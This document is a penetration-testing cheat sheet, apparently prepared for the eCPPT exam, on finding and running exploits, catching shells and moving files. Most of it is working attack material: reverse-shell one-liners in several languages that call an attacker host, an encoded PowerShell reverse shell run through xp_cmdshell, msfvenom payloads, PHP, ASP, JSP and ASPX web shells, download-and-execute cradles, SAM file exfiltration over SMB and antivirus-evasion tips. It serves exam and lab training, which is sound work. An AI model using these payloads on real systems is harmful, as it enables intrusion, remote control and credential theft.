Shells, Transfers, and Exploit Workflow Reference


Searchsploit and Exploit Workflow

Finding Exploits

searchsploit <service> <version>        # exact match
searchsploit <service>                  # broader — if exact version returns nothing
searchsploit -m <exploit-path>          # copy exploit to current directory
searchsploit -p <exploit-id>            # show full path
searchsploit -u                         # update database

Tips: Search broad first, then narrow. Apache 2.4.49 returns nothing? Try Apache 2.4. Always also Google: <service> <version> exploit github.

Before Running Any Exploit

  1. Read the code — understand what it does
  2. Check variables — look for hardcoded IP, port, path, username at the top
  3. Check target — does the exploit match the exact version AND architecture (32 vs 64)?
  4. Set up listener before executing
  5. If exploit fails — read error output, check architecture, try a different PoC from GitHub

Compiling Exploits

# C for Linux
gcc exploit.c -o exploit
gcc -m32 exploit.c -o exploit            # 32-bit
gcc exploit.c -o exploit -static         # static (no dependency issues on target)

# C for Windows (cross-compile on Kali)
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe       # 64-bit
i686-w64-mingw32-gcc exploit.c -o exploit.exe          # 32-bit
# ⚠️ Network exploits using Winsock (socket, connect, send, recv) NEED -lws2_32:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
# Undefined reference to WSAStartup/socket/connect? → add -lws2_32

# Python — just run it
python3 exploit.py
pip install <missing-module>             # if dependencies missing

Reverse Shells

The best way for windows powershell one liner is:

1- Get a Powershell #2 from revshells.com ( important only copy the unquoted part (“copy this “) 2- go to cyberchef.com 3- Pase the rev shell we will use 4- Choose ’encode text’ and pick Encoding ‘UTF-16LE (1200)’ 5- Chose base64 and encode 6- Copy paste the output

Always set up listener first:

rlwrap nc -lvnp 4444           # basic (use rlwrap for arrow keys)

# Socat stable TTY (best quality shell if socat available on target)
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:4444

Best way for reverse shell on mssql:

SQL (SIGNED\Administrator  dbo@master)> EXEC xp_cmdshell 'powershell -exec -bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAzADcAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';

Linux Shells

bash -c 'bash -i >& /dev/tcp/$KALI/4444 0>&1'

# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP
php -r '$sock=fsockopen("ATTACKER",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $KALI 4444 >/tmp/f

# Perl
perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Windows Shells — Step by Step (try in this order)

GOLDEN RULE: Don’t fight quoting. Upload a file and execute it. Use C:\Windows\Temp\ — it ALWAYS exists. C:\Temp\ often doesn’t. Port 4444 blocked? Try 80 or 443 — firewalls allow web ports.

STEP 1: Upload nc.exe to target (pick one method)

# From Kali — host nc.exe
cp /usr/share/windows-resources/binaries/nc.exe . && python3 -m http.server 80

# On target — download it (try these in order until one works)
certutil -urlcache -f http://YOUR_IP/nc.exe C:\Windows\Temp\nc.exe
powershell -c "curl http://YOUR_IP/nc.exe -o C:/Windows/Temp/nc.exe"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://YOUR_IP/nc.exe','C:\Windows\Temp\nc.exe')"

STEP 2: Start listener on Kali

rlwrap nc -nlvp 80    # use port 80 or 443 if 4444 is blocked

STEP 3: Execute nc.exe on target

C:\Windows\Temp\nc.exe YOUR_IP 80 -e cmd.exe

IF nc.exe doesn’t work, try PowerShell base64 (no quoting issues):

# On Kali — generate base64 encoded reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=80 -f psh -o shell.ps1
cat shell.ps1 | iconv -t UTF-16LE | base64 -w 0
# Copy the output

# On target — execute (one string, no quotes to break)
powershell -e <PASTE_BASE64_HERE>

IF you need a PowerShell download cradle:

# Quoting pattern: single quotes OUTSIDE, double quotes INSIDE
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/shell.ps1')"

IF you’re injecting into a Python/Ruby exploit (-c flag):

# WRONG — bash doesn't exist on Windows
-c "bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"

# RIGHT — use PowerShell base64 (no quoting conflicts)
-c 'powershell -e <BASE64>'

# RIGHT — use nc.exe (no quoting conflicts)
-c 'C:\Windows\Temp\nc.exe YOUR_IP 80 -e cmd.exe'

# RIGHT — download then execute (single outside, double inside)
-c 'powershell -c "curl http://YOUR_IP/nc.exe -o C:/Windows/Temp/nc.exe"'
-c 'C:\Windows\Temp\nc.exe YOUR_IP 80 -e cmd.exe'

IF AV blocks your payload:

msfvenom psh payloads  often caught by Defender
nc.exe  rarely caught
msfvenom exe  sometimes caught  try exe-service or use Metasploit handler
Metasploit  use exploit/multi/handler (unrestricted on eCPPT)

WINDOWS SHELL DECISION TREE:

Need a Windows reverse shell?
    
    ├── Can upload files?  nc.exe (ALWAYS try this first)
    
    ├── Can run PowerShell?  powershell -e <BASE64>
    
    ├── Injecting into exploit?  -c 'powershell -e <BASE64>'
                                 or: -c 'C:\Windows\Temp\nc.exe IP PORT -e cmd'
    
    ├── AV blocking everything?  Metasploit (unrestricted on eCPPT)
    
    └── Port blocked?  try 80 or 443 instead of 4444

HARD-LEARNED LESSONS:

1. C:\Temp might not exist. C:\Windows\Temp ALWAYS exists.
2. Port 4444 blocked? Try 80 or 443.
3. certutil blocked? Use: powershell -c "curl http://IP/file -o C:/Windows/Temp/file"
4. msfvenom psh payloads get caught by AV. nc.exe usually doesn't.
5. Quoting: single quotes outside, double quotes inside.
6. Windows has no /bin/bash. Stop injecting Linux payloads into Windows exploits.

msfvenom Payload Matrix

FormatCommand
Linux ELFmsfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf
Windows EXEmsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe
Windows DLLmsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o shell.dll
MSImsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o shell.msi
ASPmsfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f asp -o shell.asp
ASPXmsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f aspx -o shell.aspx
JSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw -o shell.jsp
WARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war
PHPmsfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw -o shell.php
HTAmsfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f hta-psh -o shell.hta
C:\temp\nc.exe ATTACKER 4444 -e cmd.exe

Groovy Reverse Shell (Jenkins Script Console)

String host="ATTACKER";int port=4444;String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};p.destroy();s.close();

For Linux Jenkins: change cmd.exe to /bin/bash.

Tomcat WAR Shell Deployment

If you have Tomcat Manager creds (try tomcat:s3cret, admin:admin):

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war
curl -u 'tomcat:s3cret' --upload-file shell.war "http://$ip:8080/manager/text/deploy?path=/shell"
curl http://$ip:8080/shell/       # triggers reverse shell

Web Shells

<?php system($_GET['cmd']); ?>
<% Set o = Server.CreateObject("WSCRIPT.SHELL") : Set x = o.exec("cmd /c " & Request("cmd")) : Response.Write x.StdOut.ReadAll %>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>


Shell Upgrade (Linux — do IMMEDIATELY after landing)

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z (background)
stty raw -echo; fg
# Press Enter twice
export TERM=xterm-256color
stty rows 50 cols 200

Windows: use rlwrap nc -lvnp 4444 when catching shells.


File Transfers

Linux Target

# HTTP (most common — attacker runs: python3 -m http.server 80)
wget http://ATTACKER/file -O /tmp/file
curl http://ATTACKER/file -o /tmp/file

# In-memory execution (no file on disk)
curl http://ATTACKER/linpeas.sh | bash

# No wget/curl available
cat < /dev/tcp/ATTACKER/80 > file.txt

# Netcat (attacker: nc -lvnp 9999 < file)
nc ATTACKER 9999 > file

# SCP (if SSH access)
scp user@ATTACKER:/path/file /tmp/file

Windows Target

certutil -urlcache -split -f http://ATTACKER/file.exe C:\Users\Public\file.exe

# PowerShell
iwr -uri http://ATTACKER/file.exe -outfile file.exe
(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER/file.exe','C:\Users\Public\file.exe')

# In-memory execution (PowerShell)
IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER/script.ps1')

# Bitsadmin (if certutil/PS blocked)
bitsadmin /transfer job /download /priority high http://ATTACKER/file.exe C:\Users\Public\file.exe

SSH Connection Troubleshooting (ARM64 Kali / Parallels)

If SSH hangs at key exchange (debug shows “expecting SSH2_MSG_KEX_ECDH_REPLY”):

# Fix: force a different key exchange algorithm
ssh -i key user@target -p PORT -o KexAlgorithms=curve25519-sha256

# If shell hangs after login, force interactive bash
ssh -i key user@target -p PORT -o KexAlgorithms=curve25519-sha256 -t "bash -i"

# Combined: port forward + working shell + kex fix
ssh -i key user@target -p PORT -o KexAlgorithms=curve25519-sha256 -t "bash -i" -L 8080:127.0.0.1:8080

SMB Server (best for Windows — handles upload AND download)

ALWAYS use -user and -password. Modern Windows (Win10/11, Server 2019+) blocks anonymous SMB with: ‘organization’s policies block unauthenticated guest access’. Anonymous SMB without creds will fail silently or error out.

If net use also fails, flip the transfer: run python3 -m http.server 8888 on the Windows target and wget from Kali instead.

# Attacker:
impacket-smbserver smb $(pwd) -smb2support -user test -password test

# Windows target:
net use \\$KALI\smb /user:test test
copy \\$KALI\smb\file.exe .
copy C:\sam \\$KALI\smb\sam    # exfiltrate
net use \\ATTACKER\smb /delete

Base64 Transfer (when all else fails)

# Encode on Kali:
base64 -w 0 file.bin | xclip -selection clipboard

# Decode on Linux target:
echo 'BASE64STRING' | base64 -d > file.bin

# Decode on Windows target (PowerShell):
[IO.File]::WriteAllBytes("C:\temp\file.exe",[Convert]::FromBase64String("BASE64STRING"))

Port Scanning from Pivot Hosts (no nmap available)

From Windows

# Single port test
Test-NetConnection -Port 445 10.10.10.5

# Scan common ports on a host
@(21,22,80,135,139,445,1433,3389,5985) | % { $r = Test-NetConnection 10.10.10.5 -Port $_ -WarningAction SilentlyContinue; if($r.TcpTestSucceeded){"Port $_ OPEN"} }

# Sweep subnet for specific port
1..254 | % { Test-NetConnection "10.10.10.$_" -Port 445 -WarningAction SilentlyContinue -InformationLevel Quiet }

From Linux (no tools)

# Bash TCP scan
for port in 21 22 80 443 445 3389 5985; do (echo >/dev/tcp/10.10.10.5/$port) 2>/dev/null && echo "Port $port OPEN"; done

# Ping sweep
for i in $(seq 1 254); do (ping -c 1 -W 1 10.10.10.$i | grep "bytes from" &); done; wait

Fixing Python2 Exploits to Run on Python3

Most searchsploit exploits are Python2. They WILL crash on Python3. Here’s how to fix them fast:

Python2 syntaxPython3 fixWhat broke
print "hello"print("hello")print is a function now
print "Status: %s" % varprint("Status: %s" % var)just add parens
raw_input("Enter: ")input("Enter: ")raw_input removed
except Exception, e:except Exception as e:comma syntax removed
urllib2.urlopen(url)urllib.request.urlopen(url)urllib2 merged into urllib
"string" + bytes_var"string" + bytes_var.decode()str/bytes are separate types
socket.send("cmd")socket.send(b"cmd")sockets need bytes, not str
data = "A" * 100 (for exploit buffers)data = b"A" * 100use b”” for binary payloads
xrange(100)range(100)xrange removed
dict.iteritems()dict.items()iteritems removed
dict.has_key('x')'x' in dicthas_key removed

Quick fix workflow:

# Step 1: Try running it
python3 exploit.py 2>&1 | head -5

# Step 2: If SyntaxError on print, quick sed fix
sed -i 's/^\(\s*\)print \(.*\)$/\1print(\2)/' exploit.py
# ⚠️ This handles most cases but CHECK the result — complex prints may need manual fixing

# Step 3: If it needs Python2 and the fixes are too many
# Kali has Python2 or install it:
sudo apt install python2
python2 exploit.py

Nuclear option: If the exploit is too messy to fix, search GitHub for a Python3 rewrite: <CVE number> python3 exploit github


Shell Discipline (Critical for Exam)

The Problem

Blocking reverse shells (pentestmonkey, Ivan Sincek PHP shells) can hang the web server. If triggered via browser and the connection doesn’t close cleanly, the PHP process holds the Apache worker forever. Prefork MPM with 10 workers = after 10 failed shells, all workers are stuck in T state. Only an admin can kill them.

The Rules

  1. NEVER trigger reverse shells via browser — use curl
  2. PREFER command executor + backgrounded reverse shell over blocking shells
  3. If shell dies, type ’exit’ in nc, never Ctrl+C
  4. Never hit the same shell URL twice if the first didn’t return
  5. Stabilize immediately after catching shell

Preferred Pattern: Command Executor + Backgrounded Shell

Drop this tiny non-blocking PHP shell:

Trigger reverse shell via curl with background: curl ‘http://TARGET/cmd.php?cmd=nohup+bash+-c+%22bash+-i+%3E%26+/dev/tcp/KALI/4444+0%3E%261%22+%26’

curl -s http://$TARGET/request.php

curl -s “http://$TARGET/index.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd”

curl -s “http://$TARGET/index.php?file=….//….//….//etc/passwd”

curl -sG “http://$TARGET/index.php” \

  –data-urlencode “file=simple_shell.php” \

  –data-urlencode “cmd=bash -c ‘bash -i >& /dev/tcp/$KALI/443 0>&1’”

curl -sG “http://$TARGET/index.php” \

  –data-urlencode “file=simple_shell.php” \

  –data-urlencode “cmd=python3 -c ‘import socket,subprocess,os;s=socket.socket();s.connect(("$KALI",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”

curl -sG “http://$TARGET/index.php” \

  –data-urlencode “file=simple_shell.php” \

  –data-urlencode “cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $KALI 443 >/tmp/f” The & at the end detaches from Apache worker. Worker returns immediately. Shell runs as independent process.

For Windows (aspx)

One-liner aspx command executor: <%@ Page Language=“C#” %><% Response.Write(System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo(“cmd”,"/c “+Request[“c”]){RedirectStandardOutput=true,UseShellExecute=false}).StandardOutput.ReadToEnd()); %>

Trigger: curl ‘http://TARGET/shell.aspx?c=whoami’

Then escalate to real shell by downloading nc.exe and triggering: curl ‘http://TARGET/shell.aspx?c=powershell+-c+iwr+http://KALI/nc.exe+-o+C:\Windows\Temp\nc.exe’ curl ‘http://TARGET/shell.aspx?c=C:\Windows\Temp\nc.exe+KALI+4444+-e+cmd.exe’

After Catching Shell: Stabilize

Linux: python3 -c ‘import pty;pty.spawn("/bin/bash”)’

Ctrl+Z

stty raw -echo; fg export TERM=xterm SHELL=bash

Reset rows/cols: stty rows 50 cols 200

Windows: use evil-winrm or rdp once you have creds. For raw nc shells, accept limitations or upgrade via powershell.

Symptoms: Apache listening on port 80 but requests hang. ps shows multiple httpd workers in T state. Cause: blocking PHP reverse shells accumulating, each holding a worker. Recovery: requires root to kill processes. If you lack root, revert the box.

Prevention: use the command executor pattern above. Worker returns immediately after background detach.